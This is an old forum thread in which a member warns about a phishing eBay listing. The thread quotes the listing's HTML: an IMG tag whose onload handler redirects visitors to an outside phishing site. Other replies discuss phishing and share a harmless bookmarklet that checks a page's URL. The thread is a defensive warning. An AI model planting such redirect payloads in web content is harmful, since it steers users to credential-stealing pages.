Scamming Ebay Ratbastards from Hell

polksda
polksda Posts: 716
edited April 2 in Clubhouse Archives
These slimeballs are good.... really good.

Headed to the CD category on Ebay. The first listing below looked bizarre (image blurred for decency purposes).

ebayscam1.gif


Being curious, I clicked on the auction link and ended up at the page below:

ebayscam2.gif


Now, this took me aback for a second, and then I saw the URL in the address bar.

The **** have programmed a redirect into their auction text.

I was able to do a "Save Link As..." and save the source code for the listing page. It's actually plain HTML, part of an IMG tag:

<img src=http://pics.ebaystatic.com/aw/pics/s.gif onload=location="http://holaamigo.50megs.com/main.html"&gt;

Hopefully Ebay will implement some parsing to eliminate this loophole.

Be careful out there folks...

[And yes, I reported it to Ebay immediately]
Post edited by RyanC_Masimo on

Comments

  • wingnut4772
    wingnut4772 Posts: 7,519
    edited April 2006
    Wow. That's actually pretty smart on their part. I hope they get caught.
    Sharp Elite 70
    Anthem D2V 3D
    Parasound 5250
    Parasound HCA 1000 A
    Parasound HCA 1000
    Oppo BDP 95
    Von Schweikert VR4 Jr R/L Fronts
    Von Schweikert LCR 4 Center
    Totem Mask Surrounds X4
    Hsu ULS-15 Quad Drive Subwoofers
    Sony PS3
    Squeezebox Touch

    Polk Atrium 7s on the patio just to keep my foot in the door.
  • Shizelbs
    Shizelbs Posts: 7,433
    edited April 2006
    Have fun in prison ****.
  • neomagus00
    neomagus00 Posts: 3,899
    edited April 2006
    i've never actually seen phishing in action... thanks for the tip!
    It's not good, very fundamentally simply not good. - geolemon

    "Its not good enough until we have real-time fearmongering. I want my fear mongered as it happens." - Shizelbs
  • polksda
    polksda Posts: 716
    edited April 2006
    Shizelbs wrote:
    Have fun in prison ****.

    I doubt that anyone will be caught, let alone be punished.

    If you look at the URL, it's hosted at 50megs.com, a free hosting site. These **** set up an account, use it to glean information until the account is shut down, then they move on to another host.

    I've reported email-based phishing scams to several free hosts out there that have been hosting these criminals, and the free hosts don't care. I suspect that some of the free hosts (or staff members) are in cahoots, given the lack of action...
  • bobman1235
    bobman1235 Posts: 10,822
    edited April 2006
    Email based phishing is one thing. Actually hosting it on eBay's site might piss them off to make them pursue it. How far they'll get is another story, but technically they coudl get the FBI involved.
    If you will it, dude, it is no dream.
  • Shizelbs
    Shizelbs Posts: 7,433
    edited April 2006
    polksda wrote:
    I doubt that anyone will be caught, let alone be punished.

    I doubt it also, but you never know. I certainly hope so though.
  • MacLeod
    MacLeod Posts: 14,358
    edited April 2006
    Forgive my obtuseness, but is the scam where you click on the auction and are directed to their phony login screen and when you try to log in they have your name and password?
    polkaudio sound quality competitor since 2005
    MECA SQ Rookie of the Year 06 ~ MECA State Champ 06,07,08,11 ~ MECA World Finals 2nd place 06,07,08,09
    08 Car Audio Nationals 1st ~ 07 N Georgia Nationals 1st ~ 06 Carl Casper Nationals 1st ~ USACi 05 Southeast AutumnFest 1st

    polkaudio SR6500 --- polkaudio MM1040 x2 -- Pioneer P99 -- Rockford Fosgate P1000X5D
  • Tour2ma
    Tour2ma Posts: 10,177
    edited April 2006
    EDIT: That's pretty much it, Mac...

    Love how the scammers never have learned how to spell...

    Anyone else been getting those "ebay" phish-mails that look like an ebay message and start with something along the lines of:
    "I need to hear from you about the 'such and such' that I won in your auction #123456."
    More later,
    Tour...
    Vox Copuli
    Better to remain silent and be thought a fool, than to open your mouth and remove all doubt. - Old English Proverb

    "Death doesn't come with a Uhaul." - Dennis Gardner

    "It's easy to get lost in price vs performance vs ego vs illusion." - doro
    "There is a certain entertainment value in ripping the occaisonal (sic) buttmunch..." - TroyD
  • MacLeod
    MacLeod Posts: 14,358
    edited April 2006
    Yikes!

    Ive had one of those only once so far back when I was on AOL a couple years ago. I got an email telling me my AOL account was about to be canceled due to a credit card being declined and I had to re-enter all my stats. The link took me to a website that looked identical to AOL's and asked for passwords, credit card numbers and the whole shebang!

    I didnt trust it so I called AOL and asked them and she said it was definitely a scam and got all the info and said their security department would look into it.

    It looks like their getting better with these scams. I wonder how many poor saps got suckered into this one?
    polkaudio sound quality competitor since 2005
    MECA SQ Rookie of the Year 06 ~ MECA State Champ 06,07,08,11 ~ MECA World Finals 2nd place 06,07,08,09
    08 Car Audio Nationals 1st ~ 07 N Georgia Nationals 1st ~ 06 Carl Casper Nationals 1st ~ USACi 05 Southeast AutumnFest 1st

    polkaudio SR6500 --- polkaudio MM1040 x2 -- Pioneer P99 -- Rockford Fosgate P1000X5D
  • Polkersince85
    Polkersince85 Posts: 2,883
    edited April 2006
    If you have any doubts, change your passwords to make things hard for them. Stay ahead of them and watch the URL's.
    >
    >
    >This message has been scanned by the NSA and found to be free of harmful intent.<
  • neomagus00
    neomagus00 Posts: 3,899
    edited April 2006
    even the URLs aren't a sure thing, unfortunately... a clever programmer can hide those, too, which is really frightening...

    i personally have all my websites remember me with a cookie (with appropriate security settings, naturally)... that way, it logs me in automatically, and if i see another login screen after that it makes me suspicious by default...
    It's not good, very fundamentally simply not good. - geolemon

    "Its not good enough until we have real-time fearmongering. I want my fear mongered as it happens." - Shizelbs
  • Polk65
    Polk65 Posts: 1,405
    edited April 2006
    The sad part is, it was probably done from an internet cafe via proxy.

    It's a bold scam and a reminder not to surf the internet high. :)
  • Moreants
    Moreants Posts: 70
    edited April 2006
    I keep this as a notepad file on my desktop. Just open the file and copy and past this text in the url box to confirm the actual site.


    javascript:alert("The actual URL is:\t\t" + location.protocol + "//" + location.hostname + "/" + "\nThe address URL is:\t\t" + location.href + "\n" + "\nIf the server names do not match, this may be a spoof.");
    I remember when 'broadband' meant The Go-Go's.
  • mldennison
    mldennison Posts: 307
    edited April 2006
    thats a great little piece of code! thanks!
  • Tour2ma
    Tour2ma Posts: 10,177
    edited April 2006
    That is pretty cool... I wonder why ebay and others sites that are heavily spoofed don't advertise this code's existence?

    On the other hand, according to it, this Polk Audio page is a possible spoof... but then I guess we knew that... ;)
    More later,
    Tour...
    Vox Copuli
    Better to remain silent and be thought a fool, than to open your mouth and remove all doubt. - Old English Proverb

    "Death doesn't come with a Uhaul." - Dennis Gardner

    "It's easy to get lost in price vs performance vs ego vs illusion." - doro
    "There is a certain entertainment value in ripping the occaisonal (sic) buttmunch..." - TroyD
  • bobman1235
    bobman1235 Posts: 10,822
    edited April 2006
    Tour2ma wrote:
    On the other hand, according to it, this Polk Audio page is a possible spoof... but then I guess we knew that... ;)

    :confused: It's just the root (the www.polkaudio.com part) that is supposed to be compared... I get that being the same... so Polk isn't a possible spoof. It's just checking the host name, not the entire URL.
    If you will it, dude, it is no dream.
  • 1996blackmax
    1996blackmax Posts: 2,436
    edited April 2006
    These kind of people really get under my skin......
    Alpine: CDA-7949
    Alpine: PXA-H600
    Alpine: CHA-S624, KCA-420i, KCA-410C
    Rainbow: CS 265 Profi Phase Plug / SL 165
    ARC Audio: 4150-XXK / 1500v1-XXK
    JL Audio: 10W6v2 (x2)
    KnuKonceptz
    Second Skin